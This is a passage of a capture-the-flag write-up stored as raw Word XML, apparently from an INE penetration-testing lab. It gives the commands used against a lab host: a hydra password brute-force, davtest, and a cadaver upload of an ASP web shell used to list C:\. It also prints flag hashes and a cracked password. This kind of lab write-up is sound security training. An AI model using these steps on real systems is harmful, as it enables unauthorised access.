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B3F8" w14:textId="77777777" w:rsidR="00D900A6" w:rsidRPr="00D900A6" w:rsidRDefault="00D900A6" w:rsidP="00D900A6">
      <w:r w:rsidRPr="00D900A6">
        <w:t>Host &amp; Network Penetration Testing: System-Host Based Attacks CTF 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B146EA" w14:textId="77777777" w:rsidR="00853ABF" w:rsidRDefault="00853ABF"/>
    <w:p w14:paraId="765442ED" w14:textId="77777777" w:rsidR="00D900A6" w:rsidRPr="00D900A6" w:rsidRDefault="00D900A6" w:rsidP="00D900A6">
      <w:r w:rsidRPr="00D900A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flags to Capture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19987B75" w14:textId="77777777" w:rsidR="00D900A6" w:rsidRDefault="00D900A6" w:rsidP="00D900A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D900A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D900A6">
        <w:t>: User 'bob' might not have chosen a strong password. Try common passwords to gain access to the server where the flag is located. (target1.ine.local)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAA7AAA" w14:textId="5C1E6512" w:rsidR="00D900A6" w:rsidRPr="00D900A6" w:rsidRDefault="00D900A6" w:rsidP="00D900A6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D900A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58859EFE" w14:textId="2B38E104" w:rsidR="00D900A6" w:rsidRDefault="00D900A6" w:rsidP="00D900A6">
      <w:r>
        <w:t xml:space="preserve">Perform the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA760DC" w14:textId="04D21207" w:rsidR="00D900A6" w:rsidRDefault="00D900A6" w:rsidP="00D900A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A0A4A66" wp14:editId="4AA96D41">
            <wp:extent cx="5924854" cy="4502381"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6835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43380" name="Picture 6835433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F4A0" w14:textId="5AF91381" w:rsidR="00D900A6" w:rsidRDefault="00D900A6" w:rsidP="00D900A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="206E2B6F" wp14:editId="316C64DF">
            <wp:extent cx="5816899" cy="2159111"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="191099469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94694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7378" w14:textId="77777777" w:rsidR="00D900A6" w:rsidRDefault="00D900A6" w:rsidP="00D900A6"/>
    <w:p w14:paraId="114E4A36" w14:textId="67472397" w:rsidR="00D900A6" w:rsidRDefault="00D900A6" w:rsidP="00D900A6">
      <w:r>
        <w:t xml:space="preserve">Access the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D900A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>target1.ine.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on the browser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728735D5" w14:textId="77777777" w:rsidR="00D900A6" w:rsidRDefault="00D900A6" w:rsidP="00D900A6"/>
    <w:p w14:paraId="07D3AAF6" w14:textId="166683F9" w:rsidR="00D900A6" w:rsidRDefault="00D900A6" w:rsidP="00D900A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75E1A0C6" wp14:editId="501EE8FF">
            <wp:extent cx="5531134" cy="3676839"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="581125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25977" name="Picture 5811259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3015" w14:textId="77777777" w:rsidR="00D900A6" w:rsidRDefault="00D900A6" w:rsidP="00D900A6"/>
    <w:p w14:paraId="2D31C711" w14:textId="31114A38" w:rsidR="00D900A6" w:rsidRDefault="00D900A6" w:rsidP="00D900A6">
      <w:r>
        <w:t xml:space="preserve">As question gives that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D900A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bob</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> does not chose the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stronge</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> so we set the username to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D900A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bob</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and enumerate the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19683A6C" w14:textId="029E2850" w:rsidR="00D900A6" w:rsidRDefault="00D900A6" w:rsidP="00D900A6">
      <w:r>
        <w:t>Use hydra:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4086D86D" w14:textId="77777777" w:rsidR="00D900A6" w:rsidRDefault="00D900A6" w:rsidP="00D900A6"/>
    <w:p w14:paraId="457C087D" w14:textId="3DCA33D6" w:rsidR="00D900A6" w:rsidRDefault="00AA7420" w:rsidP="00D900A6">
      <w:r w:rsidRPr="00AA7420">
        <w:t>hydra -l bob -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt target1.ine.local http-get /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C51C565" w14:textId="02488920" w:rsidR="00AA7420" w:rsidRDefault="00AA7420" w:rsidP="00D900A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33C12F92" wp14:editId="71E2F83F">
            <wp:extent cx="5848651" cy="2825895"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1806760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60264" name="Picture 18067602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FE5B" w14:textId="08EE1633" w:rsidR="00AA7420" w:rsidRDefault="00AA7420" w:rsidP="00D900A6">
      <w:r>
        <w:t>Password is cracked now:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6BC1FE" w14:textId="12DA4B68" w:rsidR="00AA7420" w:rsidRDefault="00AA7420" w:rsidP="00D900A6">
      <w:r>
        <w:t xml:space="preserve">We perform the directory </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>brutefocing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>I  know</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> about all the directory of it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5ED0FD" w14:textId="77777777" w:rsidR="00AA7420" w:rsidRDefault="00AA7420" w:rsidP="00D900A6">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50321994" w14:textId="77777777" w:rsidR="00AA7420" w:rsidRDefault="00AA7420" w:rsidP="00D900A6">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B36F110" w14:textId="3F844404" w:rsidR="00AA7420" w:rsidRDefault="00AA7420" w:rsidP="00D900A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="020B691E" wp14:editId="2DB3894E">
            <wp:extent cx="5708943" cy="4115011"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1468278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78413" name="Picture 14682784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6F8C" w14:textId="77777777" w:rsidR="00AA7420" w:rsidRDefault="00AA7420" w:rsidP="00D900A6">
      <w:r>
        <w:t xml:space="preserve">Now that we have </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>discover</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> that it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>contain</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webdav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is running on the host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2796F099" w14:textId="77777777" w:rsidR="00AA7420" w:rsidRDefault="00AA7420" w:rsidP="00D900A6">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> navigate to that directory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FB9B68" w14:textId="55CF9BAA" w:rsidR="00AA7420" w:rsidRDefault="00AA7420" w:rsidP="00D900A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1893A094" wp14:editId="4C8400F4">
            <wp:extent cx="5778797" cy="2686188"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1987413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13798" name="Picture 19874137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F6A563" w14:textId="2B8FDB4E" w:rsidR="00AA7420" w:rsidRDefault="00AA7420" w:rsidP="00D900A6">
      <w:r>
        <w:t>We find our first flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6269C40E" w14:textId="42B5B0D1" w:rsidR="00AA7420" w:rsidRDefault="00AA7420" w:rsidP="00D900A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F4D0EE0" wp14:editId="6C932B99">
            <wp:extent cx="5143764" cy="1524078"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2844464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4641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98EC" w14:textId="4C7A6986" w:rsidR="00AA7420" w:rsidRDefault="00AA7420" w:rsidP="00D900A6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Flag1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7420">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>26c634af0d1948d4b89f62c170323586</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF8B368" w14:textId="5DC0B86D" w:rsidR="00AA7420" w:rsidRDefault="00AA7420" w:rsidP="00D900A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45701AFE" wp14:editId="4BC9C42F">
            <wp:extent cx="4222967" cy="774740"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="1327863399" name="Picture 8" descr="A black background with a blu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63399" name="Picture 8" descr="A black background with a blue sky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967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5623" w14:textId="0E43FA54" w:rsidR="00AA7420" w:rsidRPr="00D900A6" w:rsidRDefault="00AA7420" w:rsidP="00D900A6"/>
    <w:p w14:paraId="09C4E6A3" w14:textId="77777777" w:rsidR="00D900A6" w:rsidRDefault="00D900A6" w:rsidP="00D900A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D900A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D900A6">
        <w:t>: Valuable files are often on the C: drive. Explore it thoroughly. (target1.ine.local)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4859F4DA" w14:textId="77777777" w:rsidR="00D900A6" w:rsidRPr="00D900A6" w:rsidRDefault="00D900A6" w:rsidP="00D900A6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D900A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD3DB34" w14:textId="77777777" w:rsidR="00AA7420" w:rsidRDefault="00AA7420" w:rsidP="00D900A6">
      <w:r w:rsidRPr="00AA7420">
        <w:t>From the flag above, we can clearly see that there is a file named test.asp, which indicates that the server accepts .asp file extensions for upload. We can also enumerate this through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AA7420">
        <w:t>davtest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AA7420">
        <w:t>. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705A8E77" w14:textId="28CC9744" w:rsidR="00D900A6" w:rsidRPr="00D900A6" w:rsidRDefault="00AA7420" w:rsidP="00D900A6">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA7420">
        <w:t>davtest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA7420">
        <w:t> is a command used to enumerate the file extensions that can be uploaded to WebDAV.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF535C6" w14:textId="77777777" w:rsidR="00D900A6" w:rsidRDefault="00D900A6" w:rsidP="00D900A6"/>
    <w:p w14:paraId="3B2694EA" w14:textId="01F01AA2" w:rsidR="00E22295" w:rsidRDefault="00E22295" w:rsidP="00D900A6">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E22295">
        <w:t>davtest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E22295">
        <w:t xml:space="preserve"> -auth </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E22295">
        <w:t>bob:password</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E22295">
        <w:t>_123321 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E22295">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E22295">
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00E22295">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://target1.ine.local/webdav</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3BE5BF12" w14:textId="77777777" w:rsidR="00E22295" w:rsidRDefault="00E22295" w:rsidP="00D900A6"/>
    <w:p w14:paraId="65F1E245" w14:textId="2257E2BF" w:rsidR="00E22295" w:rsidRDefault="00E22295" w:rsidP="00D900A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20A27B1A" wp14:editId="41E0C69F">
            <wp:extent cx="5893103" cy="3664138"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4323290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29026" name="Picture 4323290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03F2" w14:textId="06B5817A" w:rsidR="00D900A6" w:rsidRDefault="00E22295" w:rsidP="00D900A6">
      <w:r>
        <w:t>Execution file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EC819B" w14:textId="38519E55" w:rsidR="00E22295" w:rsidRDefault="00E22295" w:rsidP="00D900A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E33EF88" wp14:editId="7C82F428">
            <wp:extent cx="5823249" cy="3613336"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="561967448" name="Picture 2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67448" name="Picture 25" descr="A computer screen shot of a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249" cy="361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277A" w14:textId="77777777" w:rsidR="00D900A6" w:rsidRDefault="00D900A6" w:rsidP="00D900A6"/>
    <w:p w14:paraId="3DB36F53" w14:textId="0E4B1AFF" w:rsidR="00E22295" w:rsidRDefault="00E22295" w:rsidP="00D900A6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">We upload different </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>file</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>server</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and we obtain that we can </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> able to execute the .asp file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4435E1" w14:textId="77777777" w:rsidR="00E22295" w:rsidRDefault="00E22295" w:rsidP="00D900A6"/>
    <w:p w14:paraId="524602DB" w14:textId="50306509" w:rsidR="00E22295" w:rsidRDefault="00E22295" w:rsidP="00D900A6">
      <w:r w:rsidRPr="00E22295">
        <w:t xml:space="preserve">cadaver </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00585502">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://target1.ine.local/webdav</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="26EB7A60" w14:textId="02160C6B" w:rsidR="00E22295" w:rsidRDefault="00E22295" w:rsidP="00D900A6">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>username:bob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="15C369D6" w14:textId="16B4798F" w:rsidR="00E22295" w:rsidRDefault="00E22295" w:rsidP="00D900A6">
      <w:r>
        <w:t>password: password_123321</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608DB877" w14:textId="77777777" w:rsidR="00E22295" w:rsidRDefault="00E22295" w:rsidP="00D900A6"/>
    <w:p w14:paraId="3D54D7CE" w14:textId="63B09FFE" w:rsidR="00E22295" w:rsidRDefault="00E22295" w:rsidP="00D900A6">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>then</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>upload</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the webshell.asp file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C414AD2" w14:textId="681CDD92" w:rsidR="00E22295" w:rsidRDefault="00E22295" w:rsidP="00D900A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="366D1B42" wp14:editId="3CF9C36C">
            <wp:extent cx="5753396" cy="4502381"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16849451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45161" name="Picture 16849451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7B85" w14:textId="0E6961E5" w:rsidR="00E22295" w:rsidRDefault="00E22295" w:rsidP="00D900A6">
      <w:r>
        <w:t>File on server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704FE442" w14:textId="1D421A5C" w:rsidR="00E22295" w:rsidRDefault="00E22295" w:rsidP="00D900A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BF9F0ED" wp14:editId="29D0FD33">
            <wp:extent cx="5035809" cy="3397425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1341084876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84876" name="Picture 27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1BD1" w14:textId="1D76FBDF" w:rsidR="00E22295" w:rsidRDefault="00E22295" w:rsidP="00D900A6">
      <w:r>
        <w:t xml:space="preserve">Click on webshell.asp and get the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BD3028" w14:textId="0F5DEB78" w:rsidR="00E22295" w:rsidRDefault="00E22295" w:rsidP="00D900A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="211F17AA" wp14:editId="19B018C9">
            <wp:extent cx="4724643" cy="3606985"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="743865103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65103" name="Picture 28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C0B9" w14:textId="77777777" w:rsidR="00E22295" w:rsidRDefault="00E22295" w:rsidP="00D900A6"/>
    <w:p w14:paraId="2AEAAB25" w14:textId="119FEB64" w:rsidR="003363DD" w:rsidRDefault="003363DD" w:rsidP="00D900A6">
      <w:r w:rsidRPr="003363DD">
        <w:t>valuable files are located on the C drive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3B4061" w14:textId="1518BE82" w:rsidR="00E22295" w:rsidRDefault="00E22295" w:rsidP="00D900A6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Now run commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53349100" w14:textId="1D65DAE4" w:rsidR="00E22295" w:rsidRDefault="00DA192B" w:rsidP="00D900A6">
      <w:r>
        <w:t xml:space="preserve">Dir </w:t>
      </w:r>
      <w:r w:rsidR="003363DD">
        <w:t>C:\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642857EB" w14:textId="1A784B6C" w:rsidR="003363DD" w:rsidRDefault="003363DD" w:rsidP="00D900A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="06A36980" wp14:editId="69DFB74B">
            <wp:simplePos x="914400" y="1547446"/>
            <wp:positionH relativeFrom="column">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="5689892" cy="4140413"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="2054532917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32917" name="Picture 29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2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proofErr w:type="gramStart"/>
      <w:r>
        <w:t>we</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> have found the flag2.txt file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C74043C" w14:textId="5B682E1C" w:rsidR="003363DD" w:rsidRDefault="003363DD" w:rsidP="00D900A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46BDBD84" wp14:editId="2520A4D7">
            <wp:extent cx="5277121" cy="3016405"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1259552168" name="Picture 30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52168" name="Picture 30" descr="A screenshot of a computer erro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EEAD" w14:textId="77777777" w:rsidR="003363DD" w:rsidRDefault="003363DD" w:rsidP="00D900A6"/>
    <w:p w14:paraId="29C26A79" w14:textId="552FC7F9" w:rsidR="003363DD" w:rsidRDefault="003363DD" w:rsidP="00D900A6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag2:</w:t>
      </w:r>
      <w:r w:rsidRPr="003363DD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003363DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>d2fccab9d27546348df59819ff80d36c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143A5C67" w14:textId="3E094F2A" w:rsidR="003363DD" w:rsidRDefault="003363DD" w:rsidP="00D900A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="062ED57A" wp14:editId="1AD2FA27">
            <wp:extent cx="4121362" cy="723937"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="339308810" name="Picture 3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08810" name="Picture 31" descr="A black background with white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BC3F" w14:textId="42C9538C" w:rsidR="003363DD" w:rsidRDefault="003363DD" w:rsidP="00D900A6">
      <w:r w:rsidRPr="003363DD">
        <w:t>Alternatively, another method to obtain this flag is by using a Metasploit module. You can utilize the windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003363DD">
        <w:t>iis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003363DD">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003363DD">
        <w:t>iis_upload_webdav_upload_asp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003363DD">
        <w:t> module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E870596" w14:textId="77777777" w:rsidR="003363DD" w:rsidRPr="00D900A6" w:rsidRDefault="003363DD" w:rsidP="00D900A6"/>
    <w:p w14:paraId="3370BD07" w14:textId="7738CA4F" w:rsidR="00D900A6" w:rsidRDefault="00D900A6" w:rsidP="00D900A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D900A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D900A6">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003363DD" w:rsidRPr="003363DD">
        <w:t>SMB shares might contain hidden files. Check the available shares. (target2.ine.local)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415B4CA8" w14:textId="2C253389" w:rsidR="00D900A6" w:rsidRDefault="00D900A6" w:rsidP="00D900A6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D900A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FCAC10" w14:textId="630BE8D2" w:rsidR="00D900A6" w:rsidRDefault="003363DD" w:rsidP="00D900A6">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003363DD">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003363DD">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003363DD">
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003363DD">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
